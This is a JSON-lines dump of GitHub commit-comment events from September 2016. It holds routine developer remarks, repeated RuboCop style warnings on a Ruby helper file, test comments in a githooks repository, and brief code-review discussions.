{"id":"4544405043","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974359,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:30:59Z","updated_at":"2016-09-10T17:30:59Z","body":"test18"}},"created_at":"2016-09-10T17:30:59Z"}
{"id":"4544405261","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18974360,"position":null,"line":null,"path":null,"commit_id":"b98f7b508eba571cb1dc89ed2959a10173823d23","created_at":"2016-09-10T17:31:09Z","updated_at":"2016-09-10T17:31:09Z","body":"FYI:\r\n\r\n67e27009934a75a50789ffc3b7d9f8ac2a419e6c  push missing from libdroidjni\r\nlast commit is 67b1b404f38355eef26015378fd8c21aca465393"}},"created_at":"2016-09-10T17:31:09Z"}
{"id":"4544406069","type":"CommitCommentEvent","actor":{"login":"Shutocan"},"repo":{"name":"emprestes/wiki"},"payload":{"comment":{"id":18974361,"position":null,"line":null,"path":null,"commit_id":"c07dac909d3c930fe3c2cfddfdbacd305d1515fa","created_at":"2016-09-10T17:31:38Z","updated_at":"2016-09-10T17:31:38Z","body":"[#35](https://github.com/emprestes/chessgame/issues/35)"}},"created_at":"2016-09-10T17:31:38Z"}
{"id":"4544406614","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974363,"position":1,"line":null,"path":"helper.rb:26:81: C: Line is too long. [96/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:31:59Z","updated_at":"2016-09-10T17:31:59Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:31:59Z"}
{"id":"4544407368","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974364,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:32:28Z","updated_at":"2016-09-10T17:32:28Z","body":"test19"}},"created_at":"2016-09-10T17:32:28Z"}
{"id":"4544409060","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974365,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:33:42Z","updated_at":"2016-09-10T17:33:42Z","body":"test20"}},"created_at":"2016-09-10T17:33:42Z"}
{"id":"4544411364","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974369,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:35:17Z","updated_at":"2016-09-10T17:35:17Z","body":"test21"}},"created_at":"2016-09-10T17:35:17Z"}
{"id":"4544411855","type":"CommitCommentEvent","actor":{"login":"paretje"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":18974370,"position":null,"line":null,"path":null,"commit_id":"b5b1b5a675eb901b9185e01128c368daf12c48fe","created_at":"2016-09-10T17:35:37Z","updated_at":"2016-09-10T17:35:37Z","body":"@NoctuaNivalis: I already use it for [`weather`](https://github.com/paretje/dotfiles/commit/2051b0722431b8ffb53f8d020a0e0ff14a921ad3) since May. But in this case, I simply want a temperature to show in my statusbar. wttr.in isn't suitable for that as it often uses ranges of temperatures and isn't exactly intended to be parseable."}},"created_at":"2016-09-10T17:35:37Z"}
{"id":"4544412910","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974372,"position":1,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:36:20Z","updated_at":"2016-09-10T17:36:20Z","body":"hoge"}},"created_at":"2016-09-10T17:36:20Z"}
{"id":"4544413145","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974373,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:36:30Z","updated_at":"2016-09-10T17:36:30Z","body":"test22"}},"created_at":"2016-09-10T17:36:30Z"}
{"id":"4544413385","type":"CommitCommentEvent","actor":{"login":"snaow"},"repo":{"name":"wazuh/ossec-wazuh"},"payload":{"comment":{"id":18974375,"position":null,"line":null,"path":null,"commit_id":"d63361a84300cc3105a2acffb718f0c753b3e048","created_at":"2016-09-10T17:36:40Z","updated_at":"2016-09-10T17:36:40Z","body":"Many thanks again to @gaelmuller and the PR to ossec-hids https://github.com/ossec/ossec-hids/pull/181/commits/f400f13f8a6839702e2f579a6fc20759d144a8ea\r\n"}},"created_at":"2016-09-10T17:36:40Z"}
{"id":"4544413937","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974376,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:37:05Z","updated_at":"2016-09-10T17:37:05Z","body":"test23"}},"created_at":"2016-09-10T17:37:05Z"}
{"id":"4544414489","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974377,"position":null,"line":null,"path":null,"commit_id":"6af282154907081be3b06e11e44f337e5d72dfed","created_at":"2016-09-10T17:37:28Z","updated_at":"2016-09-10T17:37:28Z","body":"@atamariya Could explain me why you make this choice ?"}},"created_at":"2016-09-10T17:37:28Z"}
{"id":"4544414954","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974379,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:37:47Z","updated_at":"2016-09-10T17:37:47Z","body":"test24"}},"created_at":"2016-09-10T17:37:47Z"}
{"id":"4544415242","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974380,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:37:57Z","updated_at":"2016-09-10T17:37:57Z","body":"test25"}},"created_at":"2016-09-10T17:37:57Z"}
{"id":"4544415873","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974381,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:38:24Z","updated_at":"2016-09-10T17:38:24Z","body":"test26"}},"created_at":"2016-09-10T17:38:24Z"}
{"id":"4544416506","type":"CommitCommentEvent","actor":{"login":"croptekripp"},"repo":{"name":"somerobots/Trident"},"payload":{"comment":{"id":18974382,"position":null,"line":null,"path":null,"commit_id":"171dfc5c33cce8b8bad9b8bc06d900d68fbb57dd","created_at":"2016-09-10T17:38:51Z","updated_at":"2016-09-10T17:38:51Z","body":"171dfc5"}},"created_at":"2016-09-10T17:38:51Z"}
{"id":"4544416685","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974383,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:38:58Z","updated_at":"2016-09-10T17:38:58Z","body":"test27"}},"created_at":"2016-09-10T17:38:58Z"}
{"id":"4544418039","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18974387,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-10T17:39:57Z","updated_at":"2016-09-10T17:39:57Z","body":"No. It's not working on latest cm13's. \r\n-----------Discussion closed here-----------\r\nNo more further discussions. I know what i am doing. "}},"created_at":"2016-09-10T17:39:57Z"}
{"id":"4544418233","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Web"},"payload":{"comment":{"id":18974388,"position":null,"line":null,"path":null,"commit_id":"2446c93411ae809016450a33e05a404400d9f090","created_at":"2016-09-10T17:40:05Z","updated_at":"2016-09-10T17:40:05Z","body":"#3 "}},"created_at":"2016-09-10T17:40:05Z"}
{"id":"4544418284","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974389,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:40:08Z","updated_at":"2016-09-10T17:40:08Z","body":"test28"}},"created_at":"2016-09-10T17:40:08Z"}
{"id":"4544420025","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974390,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:41:25Z","updated_at":"2016-09-10T17:41:25Z","body":"test29"}},"created_at":"2016-09-10T17:41:25Z"}
{"id":"4544421710","type":"CommitCommentEvent","actor":{"login":"wibs"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18974391,"position":64,"line":111,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T17:42:34Z","updated_at":"2016-09-10T17:42:34Z","body":"It does seem that these would more correctly be marked as private, since these are only being used within the scope of class DataManager { ... }.    This SO post does a good job of summarizing the difference: http://stackoverflow.com/a/39027497/3362256"}},"created_at":"2016-09-10T17:42:34Z"}
{"id":"4544426326","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974395,"position":26,"line":26,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:45:49Z","updated_at":"2016-09-10T17:45:49Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:45:49Z"}
{"id":"4544428674","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"nagalun/multiplayerpiano-server"},"payload":{"comment":{"id":18974400,"position":null,"line":null,"path":null,"commit_id":"3fa15df38b6e55a6e0cd4055a637afc61bc56798","created_at":"2016-09-10T17:47:39Z","updated_at":"2016-09-10T17:47:39Z","body":"You also want to delete the std::string on disconnection. And if you end up with more complex per-socket-data you can have it hold a struct to simplify it. Do you have a demo page for this? Seems funny :)"}},"created_at":"2016-09-10T17:47:39Z"}
{"id":"4544429148","type":"CommitCommentEvent","actor":{"login":"wibs"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18974401,"position":52,"line":97,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T17:47:57Z","updated_at":"2016-09-10T17:47:57Z","body":"This is correctly marked as fileprivate, since we need to access this constant within the DataManager class.  If it was just marked as private we wouldn't be able to access it.  "}},"created_at":"2016-09-10T17:47:57Z"}
{"id":"4544431188","type":"CommitCommentEvent","actor":{"login":"as59203"},"repo":{"name":"as59203/Discord-NameFilter"},"payload":{"comment":{"id":18974402,"position":7,"line":40,"path":"bot.py","commit_id":"57daba0c4bf0b5378e361685fc952381ff046d5d","created_at":"2016-09-10T17:49:28Z","updated_at":"2016-09-10T17:49:28Z","body":"@client.event"}},"created_at":"2016-09-10T17:49:28Z"}
{"id":"4544432760","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974403,"position":26,"line":26,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:50:32Z","updated_at":"2016-09-10T17:50:32Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:50:32Z"}
{"id":"4544433159","type":"CommitCommentEvent","actor":{"login":"as59203"},"repo":{"name":"as59203/Discord-NameFilter"},"payload":{"comment":{"id":18974405,"position":3,"line":36,"path":"bot.py","commit_id":"57daba0c4bf0b5378e361685fc952381ff046d5d","created_at":"2016-09-10T17:50:49Z","updated_at":"2016-09-10T17:50:49Z","body":"   @client.event\r\n      async def on_message(message):\t\t      async def on_message(message):\r\n +        if message.content.startswith('!resetnick'):\r\n +            try:\r\n +                await client.change_nickname(message.author, \"\")\r\n +                await client.send_message(message.author, \"You have successfully reset your nickname to `%s`!\\n```Please consider changing your username to an appropriate name that does not include unicode special characters.```\" % message.author.name)"}},"created_at":"2016-09-10T17:50:49Z"}
{"id":"4544434716","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974408,"position":26,"line":26,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:51:56Z","updated_at":"2016-09-10T17:51:56Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:51:56Z"}
{"id":"4544434736","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974409,"position":27,"line":27,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:51:58Z","updated_at":"2016-09-10T17:51:58Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:51:58Z"}
{"id":"4544434757","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974411,"position":28,"line":28,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:51:59Z","updated_at":"2016-09-10T17:51:59Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:51:59Z"}
{"id":"4544434797","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974412,"position":32,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:01Z","updated_at":"2016-09-10T17:52:01Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:52:01Z"}
{"id":"4544434826","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974413,"position":32,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:02Z","updated_at":"2016-09-10T17:52:02Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:52:02Z"}
{"id":"4544434843","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974414,"position":33,"line":33,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:04Z","updated_at":"2016-09-10T17:52:04Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:52:04Z"}
{"id":"4544434873","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974415,"position":35,"line":35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:06Z","updated_at":"2016-09-10T17:52:06Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:52:06Z"}
{"id":"4544434911","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974416,"position":35,"line":35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:08Z","updated_at":"2016-09-10T17:52:08Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:52:08Z"}
{"id":"4544434930","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974417,"position":38,"line":38,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:09Z","updated_at":"2016-09-10T17:52:09Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:52:09Z"}
{"id":"4544434974","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974418,"position":38,"line":38,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:11Z","updated_at":"2016-09-10T17:52:11Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:52:11Z"}
{"id":"4544435042","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974419,"position":39,"line":39,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:13Z","updated_at":"2016-09-10T17:52:13Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:52:13Z"}
{"id":"4544435132","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974420,"position":44,"line":44,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:18Z","updated_at":"2016-09-10T17:52:18Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:52:18Z"}
{"id":"4544435189","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974421,"position":50,"line":50,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:20Z","updated_at":"2016-09-10T17:52:20Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T17:52:20Z"}
{"id":"4544435239","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974422,"position":50,"line":50,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:22Z","updated_at":"2016-09-10T17:52:22Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T17:52:22Z"}
{"id":"4544435324","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974426,"position":58,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:26Z","updated_at":"2016-09-10T17:52:26Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:52:26Z"}
{"id":"4544435348","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974427,"position":58,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:28Z","updated_at":"2016-09-10T17:52:28Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:52:28Z"}
{"id":"4544435400","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974428,"position":58,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:29Z","updated_at":"2016-09-10T17:52:29Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T17:52:29Z"}
{"id":"4544435429","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974429,"position":59,"line":59,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:31Z","updated_at":"2016-09-10T17:52:31Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:52:31Z"}
{"id":"4544435484","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974430,"position":60,"line":60,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:52:32Z","updated_at":"2016-09-10T17:52:32Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:52:32Z"}
{"id":"4544436251","type":"CommitCommentEvent","actor":{"login":"ricardorlopes"},"repo":{"name":"peixe358/3dVisualization"},"payload":{"comment":{"id":18974431,"position":12,"line":12,"path":"libmc920/prog/code.c","commit_id":"e253e10c4f921da163b80a48bd78c6496f42abec","created_at":"2016-09-10T17:53:07Z","updated_at":"2016-09-10T17:53:07Z","body":"Ele da pau aqui :|"}},"created_at":"2016-09-10T17:53:07Z"}
{"id":"4544436430","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18974432,"position":null,"line":null,"path":null,"commit_id":"4dd886eb6ea57a51f5cad2fbf5ebc2f2a74e20ea","created_at":"2016-09-10T17:53:14Z","updated_at":"2016-09-10T17:53:14Z","body":"I just grabbed the defconfig from the stock kernel\n\nOn Sep 10, 2016 12:52 PM, \"Khantastic Fareed\" <notifications@github.com>\nwrote:\n\n> @flar2 <https://github.com/flar2> may i know why did you disable Hall\n> driver by xiaomi and instated used caf one?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/flar2/kenzo/commit/4dd886eb6ea57a51f5cad2fbf5ebc2f2a74e20ea#commitcomment-18974190>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACn8hRMkxZXoLUMQ2XX9xnfbCHBvpPSoks5qouBWgaJpZM4J5w-X>\n> .\n>\n"}},"created_at":"2016-09-10T17:53:14Z"}
{"id":"4544437192","type":"CommitCommentEvent","actor":{"login":"FredrIQ"},"repo":{"name":"Diegoisawesome/AwesomeMapEditor"},"payload":{"comment":{"id":18974435,"position":null,"line":null,"path":null,"commit_id":"781a7724a78076853762921718725b0955adc705","created_at":"2016-09-10T17:53:47Z","updated_at":"2016-09-10T17:53:47Z","body":"Am I missing something or is this commit just adding a few trailing spaces? Why?"}},"created_at":"2016-09-10T17:53:47Z"}
{"id":"4544437322","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974436,"position":5,"line":356,"path":"src/main/java/net/pms/formats/Format.java","commit_id":"78295dc30bc95310bf7d92af325f082abafd03ba","created_at":"2016-09-10T17:53:53Z","updated_at":"2016-09-10T17:53:53Z","body":"@atamariya \".sw\" is correct as well but i don't how renderers handle it. FFmpeg could output it though."}},"created_at":"2016-09-10T17:53:53Z"}
{"id":"4544437574","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974437,"position":26,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:05Z","updated_at":"2016-09-10T17:54:05Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:54:05Z"}
{"id":"4544437595","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974438,"position":27,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:07Z","updated_at":"2016-09-10T17:54:07Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:54:07Z"}
{"id":"4544437640","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974439,"position":28,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:09Z","updated_at":"2016-09-10T17:54:09Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:54:09Z"}
{"id":"4544437696","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974441,"position":32,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:11Z","updated_at":"2016-09-10T17:54:11Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:54:11Z"}
{"id":"4544437740","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974442,"position":32,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:12Z","updated_at":"2016-09-10T17:54:12Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:54:12Z"}
{"id":"4544437779","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974443,"position":33,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:14Z","updated_at":"2016-09-10T17:54:14Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:54:14Z"}
{"id":"4544437807","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974444,"position":35,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:15Z","updated_at":"2016-09-10T17:54:15Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:54:15Z"}
{"id":"4544437858","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974445,"position":35,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:17Z","updated_at":"2016-09-10T17:54:17Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:54:17Z"}
{"id":"4544437891","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974446,"position":38,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:19Z","updated_at":"2016-09-10T17:54:19Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:54:19Z"}
{"id":"4544437926","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974447,"position":38,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:20Z","updated_at":"2016-09-10T17:54:20Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:54:20Z"}
{"id":"4544437963","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974448,"position":39,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:22Z","updated_at":"2016-09-10T17:54:22Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:54:22Z"}
{"id":"4544438018","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974449,"position":44,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:25Z","updated_at":"2016-09-10T17:54:25Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:54:25Z"}
{"id":"4544438089","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974450,"position":50,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:27Z","updated_at":"2016-09-10T17:54:27Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T17:54:27Z"}
{"id":"4544438114","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974451,"position":50,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:29Z","updated_at":"2016-09-10T17:54:29Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T17:54:29Z"}
